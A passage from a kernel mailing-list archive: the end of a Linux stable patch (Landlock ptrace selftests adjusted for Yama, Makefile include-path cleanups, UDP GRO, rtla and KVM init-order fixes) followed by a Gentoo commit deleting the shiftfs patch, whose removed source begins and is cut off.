+@@ -19,6 +19,12 @@
+ 
+ #include "common.h"
+ 
++/* Copied from security/yama/yama_lsm.c */
++#define YAMA_SCOPE_DISABLED 0
++#define YAMA_SCOPE_RELATIONAL 1
++#define YAMA_SCOPE_CAPABILITY 2
++#define YAMA_SCOPE_NO_ATTACH 3
++
+ static void create_domain(struct __test_metadata *const _metadata)
+ {
+ 	int ruleset_fd;
+@@ -60,6 +66,25 @@ static int test_ptrace_read(const pid_t pid)
+ 	return 0;
+ }
+ 
++static int get_yama_ptrace_scope(void)
++{
++	int ret;
++	char buf[2] = {};
++	const int fd = open("/proc/sys/kernel/yama/ptrace_scope", O_RDONLY);
++
++	if (fd < 0)
++		return 0;
++
++	if (read(fd, buf, 1) < 0) {
++		close(fd);
++		return -1;
++	}
++
++	ret = atoi(buf);
++	close(fd);
++	return ret;
++}
++
+ /* clang-format off */
+ FIXTURE(hierarchy) {};
+ /* clang-format on */
+@@ -232,8 +257,51 @@ TEST_F(hierarchy, trace)
+ 	pid_t child, parent;
+ 	int status, err_proc_read;
+ 	int pipe_child[2], pipe_parent[2];
++	int yama_ptrace_scope;
+ 	char buf_parent;
+ 	long ret;
++	bool can_read_child, can_trace_child, can_read_parent, can_trace_parent;
++
++	yama_ptrace_scope = get_yama_ptrace_scope();
++	ASSERT_LE(0, yama_ptrace_scope);
++
++	if (yama_ptrace_scope > YAMA_SCOPE_DISABLED)
++		TH_LOG("Incomplete tests due to Yama restrictions (scope %d)",
++		       yama_ptrace_scope);
++
++	/*
++	 * can_read_child is true if a parent process can read its child
++	 * process, which is only the case when the parent process is not
++	 * isolated from the child with a dedicated Landlock domain.
++	 */
++	can_read_child = !variant->domain_parent;
++
++	/*
++	 * can_trace_child is true if a parent process can trace its child
++	 * process.  This depends on two conditions:
++	 * - The parent process is not isolated from the child with a dedicated
++	 *   Landlock domain.
++	 * - Yama allows tracing children (up to YAMA_SCOPE_RELATIONAL).
++	 */
++	can_trace_child = can_read_child &&
++			  yama_ptrace_scope <= YAMA_SCOPE_RELATIONAL;
++
++	/*
++	 * can_read_parent is true if a child process can read its parent
++	 * process, which is only the case when the child process is not
++	 * isolated from the parent with a dedicated Landlock domain.
++	 */
++	can_read_parent = !variant->domain_child;
++
++	/*
++	 * can_trace_parent is true if a child process can trace its parent
++	 * process.  This depends on two conditions:
++	 * - The child process is not isolated from the parent with a dedicated
++	 *   Landlock domain.
++	 * - Yama is disabled (YAMA_SCOPE_DISABLED).
++	 */
++	can_trace_parent = can_read_parent &&
++			   yama_ptrace_scope <= YAMA_SCOPE_DISABLED;
+ 
+ 	/*
+ 	 * Removes all effective and permitted capabilities to not interfere
+@@ -264,16 +332,21 @@ TEST_F(hierarchy, trace)
+ 		/* Waits for the parent to be in a domain, if any. */
+ 		ASSERT_EQ(1, read(pipe_parent[0], &buf_child, 1));
+ 
+-		/* Tests PTRACE_ATTACH and PTRACE_MODE_READ on the parent. */
++		/* Tests PTRACE_MODE_READ on the parent. */
+ 		err_proc_read = test_ptrace_read(parent);
++		if (can_read_parent) {
++			EXPECT_EQ(0, err_proc_read);
++		} else {
++			EXPECT_EQ(EACCES, err_proc_read);
++		}
++
++		/* Tests PTRACE_ATTACH on the parent. */
+ 		ret = ptrace(PTRACE_ATTACH, parent, NULL, 0);
+-		if (variant->domain_child) {
++		if (can_trace_parent) {
++			EXPECT_EQ(0, ret);
++		} else {
+ 			EXPECT_EQ(-1, ret);
+ 			EXPECT_EQ(EPERM, errno);
+-			EXPECT_EQ(EACCES, err_proc_read);
+-		} else {
+-			EXPECT_EQ(0, ret);
+-			EXPECT_EQ(0, err_proc_read);
+ 		}
+ 		if (ret == 0) {
+ 			ASSERT_EQ(parent, waitpid(parent, &status, 0));
+@@ -283,11 +356,11 @@ TEST_F(hierarchy, trace)
+ 
+ 		/* Tests child PTRACE_TRACEME. */
+ 		ret = ptrace(PTRACE_TRACEME);
+-		if (variant->domain_parent) {
++		if (can_trace_child) {
++			EXPECT_EQ(0, ret);
++		} else {
+ 			EXPECT_EQ(-1, ret);
+ 			EXPECT_EQ(EPERM, errno);
+-		} else {
+-			EXPECT_EQ(0, ret);
+ 		}
+ 
+ 		/*
+@@ -296,7 +369,7 @@ TEST_F(hierarchy, trace)
+ 		 */
+ 		ASSERT_EQ(1, write(pipe_child[1], ".", 1));
+ 
+-		if (!variant->domain_parent) {
++		if (can_trace_child) {
+ 			ASSERT_EQ(0, raise(SIGSTOP));
+ 		}
+ 
+@@ -321,7 +394,7 @@ TEST_F(hierarchy, trace)
+ 	ASSERT_EQ(1, read(pipe_child[0], &buf_parent, 1));
+ 
+ 	/* Tests child PTRACE_TRACEME. */
+-	if (!variant->domain_parent) {
++	if (can_trace_child) {
+ 		ASSERT_EQ(child, waitpid(child, &status, 0));
+ 		ASSERT_EQ(1, WIFSTOPPED(status));
+ 		ASSERT_EQ(0, ptrace(PTRACE_DETACH, child, NULL, 0));
+@@ -331,17 +404,23 @@ TEST_F(hierarchy, trace)
+ 		EXPECT_EQ(ESRCH, errno);
+ 	}
+ 
+-	/* Tests PTRACE_ATTACH and PTRACE_MODE_READ on the child. */
++	/* Tests PTRACE_MODE_READ on the child. */
+ 	err_proc_read = test_ptrace_read(child);
++	if (can_read_child) {
++		EXPECT_EQ(0, err_proc_read);
++	} else {
++		EXPECT_EQ(EACCES, err_proc_read);
++	}
++
++	/* Tests PTRACE_ATTACH on the child. */
+ 	ret = ptrace(PTRACE_ATTACH, child, NULL, 0);
+-	if (variant->domain_parent) {
++	if (can_trace_child) {
++		EXPECT_EQ(0, ret);
++	} else {
+ 		EXPECT_EQ(-1, ret);
+ 		EXPECT_EQ(EPERM, errno);
+-		EXPECT_EQ(EACCES, err_proc_read);
+-	} else {
+-		EXPECT_EQ(0, ret);
+-		EXPECT_EQ(0, err_proc_read);
+ 	}
++
+ 	if (ret == 0) {
+ 		ASSERT_EQ(child, waitpid(child, &status, 0));
+ 		ASSERT_EQ(1, WIFSTOPPED(status));
+diff --git a/tools/testing/selftests/media_tests/Makefile b/tools/testing/selftests/media_tests/Makefile
+index 60826d7d37d49..471d83e61d95e 100644
+--- a/tools/testing/selftests/media_tests/Makefile
++++ b/tools/testing/selftests/media_tests/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ #
+-CFLAGS += -I../ -I../../../../usr/include/
++CFLAGS += -I../ $(KHDR_INCLUDES)
+ TEST_GEN_PROGS := media_device_test media_device_open video_device_test
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/membarrier/Makefile b/tools/testing/selftests/membarrier/Makefile
+index 34d1c81a2324a..fc840e06ff565 100644
+--- a/tools/testing/selftests/membarrier/Makefile
++++ b/tools/testing/selftests/membarrier/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -g -I../../../../usr/include/
++CFLAGS += -g $(KHDR_INCLUDES)
+ LDLIBS += -lpthread
+ 
+ TEST_GEN_PROGS := membarrier_test_single_thread \
+diff --git a/tools/testing/selftests/mount_setattr/Makefile b/tools/testing/selftests/mount_setattr/Makefile
+index 2250f7dcb81e3..fde72df01b118 100644
+--- a/tools/testing/selftests/mount_setattr/Makefile
++++ b/tools/testing/selftests/mount_setattr/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ # Makefile for mount selftests.
+-CFLAGS = -g -I../../../../usr/include/ -Wall -O2 -pthread
++CFLAGS = -g $(KHDR_INCLUDES) -Wall -O2 -pthread
+ 
+ TEST_GEN_FILES += mount_setattr_test
+ 
+diff --git a/tools/testing/selftests/move_mount_set_group/Makefile b/tools/testing/selftests/move_mount_set_group/Makefile
+index 80c2d86812b06..94235846b6f9b 100644
+--- a/tools/testing/selftests/move_mount_set_group/Makefile
++++ b/tools/testing/selftests/move_mount_set_group/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ # Makefile for mount selftests.
+-CFLAGS = -g -I../../../../usr/include/ -Wall -O2
++CFLAGS = -g $(KHDR_INCLUDES) -Wall -O2
+ 
+ TEST_GEN_FILES += move_mount_set_group_test
+ 
+diff --git a/tools/testing/selftests/net/fib_tests.sh b/tools/testing/selftests/net/fib_tests.sh
+index 5637b5dadabdb..70ea8798b1f60 100755
+--- a/tools/testing/selftests/net/fib_tests.sh
++++ b/tools/testing/selftests/net/fib_tests.sh
+@@ -2065,6 +2065,8 @@ EOF
+ ################################################################################
+ # main
+ 
++trap cleanup EXIT
++
+ while getopts :t:pPhv o
+ do
+ 	case $o in
+diff --git a/tools/testing/selftests/net/udpgso_bench_rx.c b/tools/testing/selftests/net/udpgso_bench_rx.c
+index 4058c7451e70d..f35a924d4a303 100644
+--- a/tools/testing/selftests/net/udpgso_bench_rx.c
++++ b/tools/testing/selftests/net/udpgso_bench_rx.c
+@@ -214,11 +214,10 @@ static void do_verify_udp(const char *data, int len)
+ 
+ static int recv_msg(int fd, char *buf, int len, int *gso_size)
+ {
+-	char control[CMSG_SPACE(sizeof(uint16_t))] = {0};
++	char control[CMSG_SPACE(sizeof(int))] = {0};
+ 	struct msghdr msg = {0};
+ 	struct iovec iov = {0};
+ 	struct cmsghdr *cmsg;
+-	uint16_t *gsosizeptr;
+ 	int ret;
+ 
+ 	iov.iov_base = buf;
+@@ -237,8 +236,7 @@ static int recv_msg(int fd, char *buf, int len, int *gso_size)
+ 		     cmsg = CMSG_NXTHDR(&msg, cmsg)) {
+ 			if (cmsg->cmsg_level == SOL_UDP
+ 			    && cmsg->cmsg_type == UDP_GRO) {
+-				gsosizeptr = (uint16_t *) CMSG_DATA(cmsg);
+-				*gso_size = *gsosizeptr;
++				*gso_size = *(int *)CMSG_DATA(cmsg);
+ 				break;
+ 			}
+ 		}
+diff --git a/tools/testing/selftests/perf_events/Makefile b/tools/testing/selftests/perf_events/Makefile
+index fcafa5f0d34c0..db93c4ff081a4 100644
+--- a/tools/testing/selftests/perf_events/Makefile
++++ b/tools/testing/selftests/perf_events/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -Wl,-no-as-needed -Wall -I../../../../usr/include
++CFLAGS += -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ LDFLAGS += -lpthread
+ 
+ TEST_GEN_PROGS := sigtrap_threads remove_on_exec
+diff --git a/tools/testing/selftests/pid_namespace/Makefile b/tools/testing/selftests/pid_namespace/Makefile
+index edafaca1aeb39..9286a1d22cd3a 100644
+--- a/tools/testing/selftests/pid_namespace/Makefile
++++ b/tools/testing/selftests/pid_namespace/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -g -I../../../../usr/include/
++CFLAGS += -g $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS = regression_enomem
+ 
+diff --git a/tools/testing/selftests/pidfd/Makefile b/tools/testing/selftests/pidfd/Makefile
+index 778b6cdc8aed8..d731e3e76d5bf 100644
+--- a/tools/testing/selftests/pidfd/Makefile
++++ b/tools/testing/selftests/pidfd/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -g -I../../../../usr/include/ -pthread -Wall
++CFLAGS += -g $(KHDR_INCLUDES) -pthread -Wall
+ 
+ TEST_GEN_PROGS := pidfd_test pidfd_fdinfo_test pidfd_open_test \
+ 	pidfd_poll_test pidfd_wait pidfd_getfd_test pidfd_setns_test
+diff --git a/tools/testing/selftests/powerpc/ptrace/Makefile b/tools/testing/selftests/powerpc/ptrace/Makefile
+index 2f02cb54224dc..cbeeaeae8837a 100644
+--- a/tools/testing/selftests/powerpc/ptrace/Makefile
++++ b/tools/testing/selftests/powerpc/ptrace/Makefile
+@@ -33,7 +33,7 @@ TESTS_64 := $(patsubst %,$(OUTPUT)/%,$(TESTS_64))
+ $(TESTS_64): CFLAGS += -m64
+ $(TM_TESTS): CFLAGS += -I../tm -mhtm
+ 
+-CFLAGS += -I../../../../../usr/include -fno-pie
++CFLAGS += $(KHDR_INCLUDES) -fno-pie
+ 
+ $(OUTPUT)/ptrace-gpr: ptrace-gpr.S
+ $(OUTPUT)/ptrace-pkey $(OUTPUT)/core-pkey: LDLIBS += -pthread
+diff --git a/tools/testing/selftests/powerpc/security/Makefile b/tools/testing/selftests/powerpc/security/Makefile
+index 7488315fd8474..e0d979ab02040 100644
+--- a/tools/testing/selftests/powerpc/security/Makefile
++++ b/tools/testing/selftests/powerpc/security/Makefile
+@@ -5,7 +5,7 @@ TEST_PROGS := mitigation-patching.sh
+ 
+ top_srcdir = ../../../../..
+ 
+-CFLAGS += -I../../../../../usr/include
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ include ../../lib.mk
+ 
+diff --git a/tools/testing/selftests/powerpc/syscalls/Makefile b/tools/testing/selftests/powerpc/syscalls/Makefile
+index b63f8459c704e..d1f2648b112b6 100644
+--- a/tools/testing/selftests/powerpc/syscalls/Makefile
++++ b/tools/testing/selftests/powerpc/syscalls/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ TEST_GEN_PROGS := ipc_unmuxed rtas_filter
+ 
+-CFLAGS += -I../../../../../usr/include
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ top_srcdir = ../../../../..
+ include ../../lib.mk
+diff --git a/tools/testing/selftests/powerpc/tm/Makefile b/tools/testing/selftests/powerpc/tm/Makefile
+index 5881e97c73c13..3876805c2f312 100644
+--- a/tools/testing/selftests/powerpc/tm/Makefile
++++ b/tools/testing/selftests/powerpc/tm/Makefile
+@@ -17,7 +17,7 @@ $(TEST_GEN_PROGS): ../harness.c ../utils.c
+ CFLAGS += -mhtm
+ 
+ $(OUTPUT)/tm-syscall: tm-syscall-asm.S
+-$(OUTPUT)/tm-syscall: CFLAGS += -I../../../../../usr/include
++$(OUTPUT)/tm-syscall: CFLAGS += $(KHDR_INCLUDES)
+ $(OUTPUT)/tm-tmspr: CFLAGS += -pthread
+ $(OUTPUT)/tm-vmx-unavail: CFLAGS += -pthread -m64
+ $(OUTPUT)/tm-resched-dscr: ../pmu/lib.c
+diff --git a/tools/testing/selftests/ptp/Makefile b/tools/testing/selftests/ptp/Makefile
+index ef06de0898b73..eeab44cc68638 100644
+--- a/tools/testing/selftests/ptp/Makefile
++++ b/tools/testing/selftests/ptp/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ TEST_PROGS := testptp
+ LDLIBS += -lrt
+ all: $(TEST_PROGS)
+diff --git a/tools/testing/selftests/rseq/Makefile b/tools/testing/selftests/rseq/Makefile
+index 215e1067f0376..3a173e184566c 100644
+--- a/tools/testing/selftests/rseq/Makefile
++++ b/tools/testing/selftests/rseq/Makefile
+@@ -4,7 +4,7 @@ ifneq ($(shell $(CC) --version 2>&1 | head -n 1 | grep clang),)
+ CLANG_FLAGS += -no-integrated-as
+ endif
+ 
+-CFLAGS += -O2 -Wall -g -I./ -I../../../../usr/include/ -L$(OUTPUT) -Wl,-rpath=./ \
++CFLAGS += -O2 -Wall -g -I./ $(KHDR_INCLUDES) -L$(OUTPUT) -Wl,-rpath=./ \
+ 	  $(CLANG_FLAGS)
+ LDLIBS += -lpthread -ldl
+ 
+diff --git a/tools/testing/selftests/sched/Makefile b/tools/testing/selftests/sched/Makefile
+index 10c72f14fea9d..099ee9213557a 100644
+--- a/tools/testing/selftests/sched/Makefile
++++ b/tools/testing/selftests/sched/Makefile
+@@ -4,7 +4,7 @@ ifneq ($(shell $(CC) --version 2>&1 | head -n 1 | grep clang),)
+ CLANG_FLAGS += -no-integrated-as
+ endif
+ 
+-CFLAGS += -O2 -Wall -g -I./ -I../../../../usr/include/  -Wl,-rpath=./ \
++CFLAGS += -O2 -Wall -g -I./ $(KHDR_INCLUDES) -Wl,-rpath=./ \
+ 	  $(CLANG_FLAGS)
+ LDLIBS += -lpthread
+ 
+diff --git a/tools/testing/selftests/seccomp/Makefile b/tools/testing/selftests/seccomp/Makefile
+index f017c382c0369..584fba4870372 100644
+--- a/tools/testing/selftests/seccomp/Makefile
++++ b/tools/testing/selftests/seccomp/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -Wl,-no-as-needed -Wall -isystem ../../../../usr/include/
++CFLAGS += -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ LDFLAGS += -lpthread
+ LDLIBS += -lcap
+ 
+diff --git a/tools/testing/selftests/sync/Makefile b/tools/testing/selftests/sync/Makefile
+index d0121a8a3523a..df0f91bf6890d 100644
+--- a/tools/testing/selftests/sync/Makefile
++++ b/tools/testing/selftests/sync/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ CFLAGS += -O2 -g -std=gnu89 -pthread -Wall -Wextra
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ LDFLAGS += -pthread
+ 
+ .PHONY: all clean
+diff --git a/tools/testing/selftests/user_events/Makefile b/tools/testing/selftests/user_events/Makefile
+index c765d8635d9af..87d54c6400681 100644
+--- a/tools/testing/selftests/user_events/Makefile
++++ b/tools/testing/selftests/user_events/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -Wl,-no-as-needed -Wall -I../../../../usr/include
++CFLAGS += -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ LDLIBS += -lrt -lpthread -lm
+ 
+ TEST_GEN_PROGS = ftrace_test dyn_test perf_test
+diff --git a/tools/testing/selftests/vm/Makefile b/tools/testing/selftests/vm/Makefile
+index 89c14e41bd437..ac9366065fd26 100644
+--- a/tools/testing/selftests/vm/Makefile
++++ b/tools/testing/selftests/vm/Makefile
+@@ -25,7 +25,7 @@ MACHINE ?= $(shell echo $(uname_M) | sed -e 's/aarch64.*/arm64/' -e 's/ppc64.*/p
+ # LDLIBS.
+ MAKEFLAGS += --no-builtin-rules
+ 
+-CFLAGS = -Wall -I $(top_srcdir) -I $(top_srcdir)/usr/include $(EXTRA_CFLAGS) $(KHDR_INCLUDES)
++CFLAGS = -Wall -I $(top_srcdir) $(EXTRA_CFLAGS) $(KHDR_INCLUDES)
+ LDLIBS = -lrt -lpthread
+ TEST_GEN_FILES = cow
+ TEST_GEN_FILES += compaction_test
+diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile
+index 0388c4d60af0e..ca9374b56ead1 100644
+--- a/tools/testing/selftests/x86/Makefile
++++ b/tools/testing/selftests/x86/Makefile
+@@ -34,7 +34,7 @@ BINARIES_64 := $(TARGETS_C_64BIT_ALL:%=%_64)
+ BINARIES_32 := $(patsubst %,$(OUTPUT)/%,$(BINARIES_32))
+ BINARIES_64 := $(patsubst %,$(OUTPUT)/%,$(BINARIES_64))
+ 
+-CFLAGS := -O2 -g -std=gnu99 -pthread -Wall
++CFLAGS := -O2 -g -std=gnu99 -pthread -Wall $(KHDR_INCLUDES)
+ 
+ # call32_from_64 in thunks.S uses absolute addresses.
+ ifeq ($(CAN_BUILD_WITH_NOPIE),1)
+diff --git a/tools/tracing/rtla/src/osnoise_hist.c b/tools/tracing/rtla/src/osnoise_hist.c
+index 5d7ea479ac89f..fe34452fc4ec0 100644
+--- a/tools/tracing/rtla/src/osnoise_hist.c
++++ b/tools/tracing/rtla/src/osnoise_hist.c
+@@ -121,6 +121,7 @@ static void osnoise_hist_update_multiple(struct osnoise_tool *tool, int cpu,
+ {
+ 	struct osnoise_hist_params *params = tool->params;
+ 	struct osnoise_hist_data *data = tool->data;
++	unsigned long long total_duration;
+ 	int entries = data->entries;
+ 	int bucket;
+ 	int *hist;
+@@ -131,10 +132,12 @@ static void osnoise_hist_update_multiple(struct osnoise_tool *tool, int cpu,
+ 	if (data->bucket_size)
+ 		bucket = duration / data->bucket_size;
+ 
++	total_duration = duration * count;
++
+ 	hist = data->hist[cpu].samples;
+ 	data->hist[cpu].count += count;
+ 	update_min(&data->hist[cpu].min_sample, &duration);
+-	update_sum(&data->hist[cpu].sum_sample, &duration);
++	update_sum(&data->hist[cpu].sum_sample, &total_duration);
+ 	update_max(&data->hist[cpu].max_sample, &duration);
+ 
+ 	if (bucket < entries)
+diff --git a/virt/kvm/coalesced_mmio.c b/virt/kvm/coalesced_mmio.c
+index 0be80c213f7f2..5ef88f5a08640 100644
+--- a/virt/kvm/coalesced_mmio.c
++++ b/virt/kvm/coalesced_mmio.c
+@@ -187,15 +187,17 @@ int kvm_vm_ioctl_unregister_coalesced_mmio(struct kvm *kvm,
+ 			r = kvm_io_bus_unregister_dev(kvm,
+ 				zone->pio ? KVM_PIO_BUS : KVM_MMIO_BUS, &dev->dev);
+ 
++			kvm_iodevice_destructor(&dev->dev);
++
+ 			/*
+ 			 * On failure, unregister destroys all devices on the
+ 			 * bus _except_ the target device, i.e. coalesced_zones
+-			 * has been modified.  No need to restart the walk as
+-			 * there aren't any zones left.
++			 * has been modified.  Bail after destroying the target
++			 * device, there's no need to restart the walk as there
++			 * aren't any zones left.
+ 			 */
+ 			if (r)
+ 				break;
+-			kvm_iodevice_destructor(&dev->dev);
+ 		}
+ 	}
+ 
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index 9c60384b5ae0b..07aae60288f92 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -5995,12 +5995,6 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
+ 
+ 	kvm_chardev_ops.owner = module;
+ 
+-	r = misc_register(&kvm_dev);
+-	if (r) {
+-		pr_err("kvm: misc device register failed\n");
+-		goto out_unreg;
+-	}
+-
+ 	register_syscore_ops(&kvm_syscore_ops);
+ 
+ 	kvm_preempt_ops.sched_in = kvm_sched_in;
+@@ -6009,11 +6003,24 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
+ 	kvm_init_debug();
+ 
+ 	r = kvm_vfio_ops_init();
+-	WARN_ON(r);
++	if (WARN_ON_ONCE(r))
++		goto err_vfio;
++
++	/*
++	 * Registration _must_ be the very last thing done, as this exposes
++	 * /dev/kvm to userspace, i.e. all infrastructure must be setup!
++	 */
++	r = misc_register(&kvm_dev);
++	if (r) {
++		pr_err("kvm: misc device register failed\n");
++		goto err_register;
++	}
+ 
+ 	return 0;
+ 
+-out_unreg:
++err_register:
++	kvm_vfio_ops_exit();
++err_vfio:
+ 	kvm_async_pf_deinit();
+ out_free_4:
+ 	for_each_possible_cpu(cpu)
+@@ -6039,8 +6046,14 @@ void kvm_exit(void)
+ {
+ 	int cpu;
+ 
+-	debugfs_remove_recursive(kvm_debugfs_dir);
++	/*
++	 * Note, unregistering /dev/kvm doesn't strictly need to come first,
++	 * fops_get(), a.k.a. try_module_get(), prevents acquiring references
++	 * to KVM while the module is being stopped.
++	 */
+ 	misc_deregister(&kvm_dev);
++
++	debugfs_remove_recursive(kvm_debugfs_dir);
+ 	for_each_possible_cpu(cpu)
+ 		free_cpumask_var(per_cpu(cpu_kick_mask, cpu));
+ 	kmem_cache_destroy(kvm_vcpu_cache);


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-03 13:02 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-03 13:02 UTC (permalink / raw
  To: gentoo-commits

commit:     a562522fe3f6aee0aaebe87bed2a32a33d739bf4
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar  3 13:02:05 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar  3 13:02:05 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=a562522f

Remove shiftfs until I fix the patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                       |    4 -
 5000_shiftfs-6.2-2023-01-31.patch | 6607 -------------------------------------
 2 files changed, 6611 deletions(-)

diff --git a/0000_README b/0000_README
index b2b768d6..49d3a418 100644
--- a/0000_README
+++ b/0000_README
@@ -87,10 +87,6 @@ Patch:  4567_distro-Gentoo-Kconfig.patch
 From:   Tom Wijsman <TomWij@gentoo.org>
 Desc:   Add Gentoo Linux support config settings and defaults.
 
-Patch:  5000_shiftfs-6.2-2023-01-31.patch
-From:   https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/unstable
-Desc:   Kernel module that provides a kernel filesystem for uid/gid shifting
-
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.

diff --git a/5000_shiftfs-6.2-2023-01-31.patch b/5000_shiftfs-6.2-2023-01-31.patch
deleted file mode 100644
index 44603abb..00000000
--- a/5000_shiftfs-6.2-2023-01-31.patch
+++ /dev/null
@@ -1,6607 +0,0 @@
-From b554e3101fdc94969141491a4234b3c931683b5c Mon Sep 17 00:00:00 2001
-From: James Bottomley <James.Bottomley@HansenPartnership.com>
-Date: Thu, 4 Apr 2019 15:39:11 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: uid/gid shifting bind mount
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1823186
-
-This allows any subtree to be uid/gid shifted and bound elsewhere.  It
-does this by operating simlarly to overlayfs.  Its primary use is for
-shifting the underlying uids of filesystems used to support
-unpriviliged (uid shifted) containers.  The usual use case here is
-that the container is operating with an uid shifted unprivileged root
-but sometimes needs to make use of or work with a filesystem image
-that has root at real uid 0.
-
-The mechanism is to allow any subordinate mount namespace to mount a
-shiftfs filesystem (by marking it FS_USERNS_MOUNT) but only allowing
-it to mount marked subtrees (using the -o mark option as root).  Once
-mounted, the subtree is mapped via the super block user namespace so
-that the interior ids of the mounting user namespace are the ids
-written to the filesystem.
-
-Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
-[ saf: use designated initializers for path declarations to fix errors
-  with struct randomization ]
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-[update: port to 5.0]
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/Kconfig                 |   8 +
- fs/Makefile                |   1 +
- fs/shiftfs.c               | 780 +++++++++++++++++++++++++++++++++++++
- include/uapi/linux/magic.h |   2 +
- 4 files changed, 791 insertions(+)
- create mode 100644 fs/shiftfs.c
-
-diff --git a/fs/Kconfig b/fs/Kconfig
-index 2685a4d0d353..b53bece1e940 100644
---- a/fs/Kconfig
-+++ b/fs/Kconfig
-@@ -128,6 +128,14 @@ source "fs/autofs/Kconfig"
- source "fs/fuse/Kconfig"
- source "fs/overlayfs/Kconfig"
- 
-+config SHIFT_FS
-+	tristate "UID/GID shifting overlay filesystem for containers"
-+	help
-+	  This filesystem can overlay any mounted filesystem and shift
-+	  the uid/gid the files appear at.  The idea is that
-+	  unprivileged containers can use this to mount root volumes
-+	  using this technique.
-+
- menu "Caches"
- 
- source "fs/netfs/Kconfig"
-diff --git a/fs/Makefile b/fs/Makefile
-index 4dea17840761..628632dcb9b1 100644
---- a/fs/Makefile
-+++ b/fs/Makefile
-@@ -137,3 +137,4 @@ obj-$(CONFIG_EFIVAR_FS)		+= efivarfs/
- obj-$(CONFIG_EROFS_FS)		+= erofs/
- obj-$(CONFIG_VBOXSF_FS)		+= vboxsf/
- obj-$(CONFIG_ZONEFS_FS)		+= zonefs/
-+obj-$(CONFIG_SHIFT_FS)		+= shiftfs.o
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-new file mode 100644
-index 000000000000..f7cada126daa
---- /dev/null
-+++ b/fs/shiftfs.c
-@@ -0,0 +1,780 @@
-+#include <linux/cred.h>
-+#include <linux/mount.h>
-+#include <linux/file.h>
-+#include <linux/fs.h>
-+#include <linux/namei.h>
-+#include <linux/module.h>
-+#include <linux/kernel.h>
-+#include <linux/magic.h>
-+#include <linux/parser.h>
-+#include <linux/seq_file.h>
-+#include <linux/statfs.h>
-+#include <linux/slab.h>
-+#include <linux/user_namespace.h>
-+#include <linux/uidgid.h>
-+#include <linux/xattr.h>
-+
-+struct shiftfs_super_info {
-+	struct vfsmount *mnt;
-+	struct user_namespace *userns;
-+	bool mark;
-+};
-+
-+static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
-+				       struct dentry *dentry);
-+
-+enum {
-+	OPT_MARK,
-+	OPT_LAST,
-+};
-+
-+/* global filesystem options */
-+static const match_table_t tokens = {
-+	{ OPT_MARK, "mark" },
-+	{ OPT_LAST, NULL }
-+};
-+
-+static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
-+{
-+	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct cred *cred = prepare_creds();
-+
-+	if (!cred)
-+		return NULL;
-+
-+	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
-+	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
-+	put_user_ns(cred->user_ns);
-+	cred->user_ns = get_user_ns(ssi->userns);
-+
-+	return cred;
-+}
-+
-+static const struct cred *shiftfs_new_creds(const struct cred **newcred,
-+					    struct super_block *sb)
-+{
-+	const struct cred *cred = shiftfs_get_up_creds(sb);
-+
-+	*newcred = cred;
-+
